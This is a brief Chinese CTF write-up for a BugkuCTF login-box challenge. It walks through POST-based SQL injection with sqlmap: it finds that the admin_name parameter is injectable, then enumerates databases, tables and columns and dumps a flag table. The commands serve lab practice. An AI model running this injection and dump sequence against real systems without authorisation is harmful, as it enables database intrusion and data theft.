BugkuCTF 这是一个神奇的登陆框

BugkuCTF 这是一个神奇的登陆框_第1张图片
BugkuCTF 这是一个神奇的登陆框_第2张图片
post注入 直接跑sqlmap吧

抓包到本地
BugkuCTF 这是一个神奇的登陆框_第3张图片

sqlmap.py -r "C:\Users\联想\Desktop\1.txt"

BugkuCTF 这是一个神奇的登陆框_第4张图片
admin_name存在注入点

查数据库

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs

BugkuCTF 这是一个神奇的登陆框_第5张图片

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tables

BugkuCTF 这是一个神奇的登陆框_第6张图片

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 --columns

BugkuCTF 这是一个神奇的登陆框_第7张图片

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 -C flag1 --dump

BugkuCTF 这是一个神奇的登陆框_第8张图片
得到flag

你可能感兴趣的:(BugkuCTF)